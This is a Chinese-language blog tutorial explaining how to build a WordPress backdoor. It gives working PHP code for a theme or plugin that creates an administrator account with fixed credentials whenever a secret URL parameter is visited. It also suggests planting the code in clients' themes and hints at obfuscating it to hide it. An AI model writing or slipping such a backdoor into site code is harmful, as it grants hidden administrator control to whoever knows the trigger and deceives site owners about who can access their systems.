国内外主机
测评及优惠码

WordPress教程:如何给WordPress创建一个后门?


什么是后门

后门的慨念非常简单,黑客通过后门进入你的WordPress管理面板,然后拿下你的服务器,想干嘛就干嘛,特别是一些高科技的电影里面,那些系统或者程序的作者都会通过自己留下的后门来拯救世界。。。
后门可以放到你的wordpress主题文件中,也可以放到你的你的插件中,所以在使用一些插件和主题的时候最好小心了。

好的用途

每件事情都有两面性,后门也不例外,你可以将这些代码放到你的客户的主题中,如果他们忘记了他们的FTP密码等等,这样就能方便的找回来,是不是很给力?
如何创建一个后门?

add_action('wp_head', 'holeinthewall'); function holeinthewall() { If ($_GET['backdoor'] == 'go') { require('wp-includes/registration.php'); If (!username_exists('username')) { $user_id = wp_create_user('username', 'password'); $user = new WP_User($user_id); $user->set_role('administrator'); } } }

现在你可以通过,example.com/?backdoor=go这样的格式来访问,然后就创建了一个用户名为“username”,密码为:“password” 的用户,权限为管理员。如果再将上面的代码加密一下,结果你懂的。。
为了使你的wordpress站点更安全你阅读以下文章:

如何保护你的wordpress防止被暴力破解?

参考资料:http://blog.wpjam.com/m/how-to-create-a-backdoor-to-a-wordpress-website/
参考资料:http://www.trickspanda.com/2014/03/create-backdoor-wordpress/

赞一个
赞(0)
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《WordPress教程:如何给WordPress创建一个后门?》
文章链接:https://www.ibytx.com/1249.html
本站资源仅供个人学习交流,请于下载后24小时内删除,不允许用于商业用途,否则法律问题自行承担。

登录

找回密码

注册